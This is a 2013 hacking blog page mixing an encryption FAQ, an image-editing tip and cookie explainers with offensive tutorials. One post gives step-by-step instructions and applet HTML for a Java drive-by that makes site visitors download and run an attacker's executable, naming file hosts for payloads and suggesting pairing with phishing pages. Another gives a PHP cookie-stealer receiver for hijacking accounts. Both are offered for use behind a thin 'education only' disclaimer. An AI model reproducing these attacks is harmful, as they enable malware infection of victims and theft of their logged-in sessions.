Friday, 12 July 2013

FAQ Encryption






Encryption is a method or a technique used to encode a message so that it can’t be read by a normal user/person. Its an art of secret writing, It can also be defined as converting information from plain text using an algorithm or a cipher to make it unreadable, So that the converted information can only be read by the person who is having the special knowledge. The process of encoding is known as Encryption and its reverse process i.e. decoding it is known as Decryption. Encryption is very useful when it comes to protecting your confidential data from being stolen. It is helpful when data is transmitted over the network, it safe guards you data from sniffers. When data is needed to be encrypted over a network, SSL Protocol is used for encryption purpose. SSL stands for Secure Socket Layer.

Types of Encryptions:-


1.Symmetrical Key :-
This type of encryption is also know as Shared Key Secret. In symmetrical encryption, the key which is used in the process of encryption, that same key is also used in the process of decryption. If two parties want to exchange the encrypted data securely, both of them should have the same copy of symmetric key.


2.Asymmetrical Key : -
This type of encryption is also know as Public Key. In this type of encryption, keys are generated in pairs, public key and private key. In asymmetrical encryption key used to encipher is different from the key used to decipher. Therefore the two partners have two different keys, one is made public and other one is made private. Let’s take up an example to understand the concept in an easy way.

Suppose, John wants to send a message to Mike, he just ciphers the message with the public key and sends it to Mike. Since Mike is having the secret key, he can and decipher the message and read its content.


Why is it important?
Today, encryption is far more sophisticated, but it serves the same purpose - to pass a secret message from one place to another without anyone else being able to read it.
Encryption is extremely important for e-commerce as it allows confidential information such as your credit card details to be sent safely to the online shop you are visiting.
Web browsers are able to encrypt your purchase details using an encryption method called 'SSL' (Secure Socket Layer). You know this is switched on when a small padlock appears in the bottom right of the browser. SSL gets switched on when you visit a 'secure server' that has an address that starts with HTTPS:// (note the 'S').


How does it work?
Encryption works by scrambling the original message with a very large digital number (key). This is done using advanced mathematics. Commercial-level encryption uses 128 bit key that is very, very hard to crack. The computer receiving the message knows the digital key and so is able to work out the original message.

Why don't we use it all the time?

There are three problems:

a) It is slower than normal browsing. It takes a while for the browser to do the maths required to scramble the message and another delay on the server that has to unscramble the data.

b) Online shops have to have a digital certificate that contains part of the key. This is not free and has to be supplied by a 'certificate authority'.

c) It can be a complicated business running a secure server, so very often, ordinary online shops will hire a specialist 'Payment Gateway' such as 'WorldPay' or 'Paypal' to handle payments for them.

How Hackers Spread Malware Using Java Drive by?


Here is the method to spread your worms,virus, key-loggers ,rat servers, etc over the web at a click. This method is used by hackers to spread. Here is the tutorial for all hackerzpositive fanz to spread your worms.


What is Java drive by?

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:

so lets make it..


Tutorial:-
1. Files Needed you can download from here Download

2. Now save any website as index.html from browser save webpage as option

3. Now make a new folder and copy index file and all files you in the downloaded folder.

4. Now in your maked folder there must be java.jar (main file) , index file , and two pics given in downloaded rar archieve.

5. Open index.html with notepad and copy and paste following code between <body> and </body> tags.:


<applet name='Please Run To Continue width='1' height='1' code='taipans.class' archive='java.jar'><param name="funtime" value="DIRECT LINK HERE"></applet>

Here, replace "DIRECT LINK HERE" with your server direct download link. example: http://example.com/download.exe

6. Save it and Done...!!!

Now your all files are ready upload your maked folder to a free hosting site ot paid if you want.
Now when your victim open ur site he will have to click download then only he will able to go to site and download file is ur virus. you can even merge it with your phishing page.

Use any server from the following to make direct download link:

http://www.dropbox.com
http://freewayhost.net
http://litetb.com
http://sharesend.com
http://www.exehost.net
http://www.largedocument.com
http://www.kiwi6.com
http://www.datafilehost.com
http://www.xup.in

Note some antivirus can detect it..!!!

Do not spread worms and hack account. It is crime. you can get caught by police if you hack accounts. Not My responsibility if you get caught. For Education Purpose Only.



Remove Background Of Any Picture Easily




Removing Background of any image or picture by using Photoshop or other software is slightly difficult, if you don't know how to use them.Well,Photoshop is a great software and offers you great features but using Photoshop is slightly difficult and also while removing background of any image using it sometimes ,If your mouse slips while selecting layers , then you are in great problem :p   Well today i'm going to introduce you to an amazing tool which will help you to remove the background of any image so easily that you will feel great with this wonderful and amazing online  tool.You Do not need to install any application or anything other to use this Online tool You just need Internet Connection. Now Without Wasting much more time let come on the main point How To Remove Background Of Any Picture Easily ?

Tutorial


Step 1 :- Open Clipping Magic official Website
Step 2 :- Open Any Image In It , You can also drag image to upload .

Step 3 :- Now , you will see editor in it.Now you have to use the brushes of different colors to mark foreground and background


The Red Brush is used to mark background.
The Green Brush is used to mark foreground.

After marking you will see you results in right side :)
That it .! 
Congratulations You Have Removed Background Of Your Pictures !

Now The Most difficult Step :p Download that pictures by clicking on download button(on top center  ).
According to me this tools is the best tool in the world and i would like to helps Clipping Magic  Admins to provide us such a great online tool ! :)

If you have any problem in this tutorial you can ask me in comments and i will try to reply as fast as i can :)

EnjoY Fa|\|s ()F Hacker konka..!!

Sunday, 7 July 2013

Hack Accounts By ARP Poisioning




What is ARP Poisioning?
ARP spoofing also known as ARP poisoning or ARP attack is a technique in which a host in a LAN can "poison" the ARP table of another host causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.

Hack Accounts By Cookie Stealing




One of the best and better idea ever to hack any account is to steal cookies and load them..Here is Tutorial for hacker konka fanz...

Computer/Browser Cookies and Uses of Cookies




What is Cookies?

HTTP cookie or Browser Cookie are used to store the information about the visitors. Also cookies used to store the Login informations(username ,passwords). It will be useful to track visitors wish so that display the related info or ads.


Different Types of Cookies:~

Session cookie:-


A session cookie upto certain hours,depending on website.  After the session hour, it will be destroyed.

Persistent Cookie:-

A persistent cookie will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies or in-memory cookies.

Secure cookie:-

Secure cookies are encrypted cookies. If you used HTTPS(secure Connection), then it will store the cookies in encrypted format. Even hackers steal the cookie, he is able to see only the encrypted data.

Example:

Bank websites always use Secure Cookies.

HttpOnly cookie:-

The HttpOnly cookie is supported by most modern browsers. On a supported browser, an HttpOnly session cookie will be used only when transmitting HTTP (or HTTPS) requests, thus restricting access from other, non-HTTP APIs (such as JavaScript). This restriction mitigates but does not eliminate the threat of session cookie theft via Cross-site scripting.[15]. It is important to realize this feature applies only to session-management cookies, and not other browser cookies.

Third-party cookie:-

Third-party cookies will store the cookies with another domain. 
For Example:
www.example.com will store the cookies with ad.advertise12.com 
At the same time, another website also set cookies with same domain. 

www.othersite.com will store the cookies with ad.advertise12.com

Supercookie:-

A "supercookie" is a cookie with a public suffix domain, like .com, .co.in,.in.


Most browsers, by default, allow first-party cookies—a cookie with domain to be the same or sub-domain of the requesting host. For example, a user visiting www.example.com can have a cookie set with domain www.example.com or .example.com, but not .com. A supercookie with domain .com would be blocked by browsers; otherwise, a malicious website, like attacker.com, could set a supercookie with domain .com and potentially disrupt or impersonate legitimate user requests to example.com.

Zombie cookie:-


A zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other locations, such as the local storage available to Flash content, HTML5 storages and other client side mechanisms, and then recreating the cookie from backup stores when the cookie's absence is detected.

What is the use of Cookies?

Session management

Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Personalization:-

Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.

Tracking:-

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision.

Hope the above information is informative :) 

Make Cookie Sealer PHP Script



Hi friends, Lets know that exactly how does a cookie stealer work. There are two components in a cookie stealer: the sender and the 


               What are Computer Cookies?

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehowattached. It can sometimes be difficult to find a way to implement the sender.


The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Php Coding a receiver is the part. Only two things are needed to make a receiver : a webhost/ftp which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.

                <?php                                                                         // line 1
               $cookie = $HTTP_GET_VARS["cookie"];       // line 2
               $file = fopen('cookielog.txt', 'a');                    // line 3
               fwrite($file, $cookie . "\n\n");                       // line 4
                ?>

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n"combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.

Line 5 is the same as before.

Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777


  • Hack Accounts By Cookie Stealing




  • Hack Accounts By ARP poisoining


  • Enjoy Guys.....From Hacker konka

     

    Visitors Info.

    You are from
    %%v_FLG%% %%v_IP%%
    %%v_CR%% ,%%v_RG%%, %%v_CI%%
    %%v_OS_IMG%% %%v_OS%%
    %%v_BRW_IMG%% %%v_BRW%%
    %%v_I_RESO%% %%v_RESO%% %%v_I_CLR%% %%v_CLR%%
    DMCA.com
    hackerkonka.blogspot.in Webutation Creative Commons License
    Hacker Konka by Konka Karthik is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
    Back To Top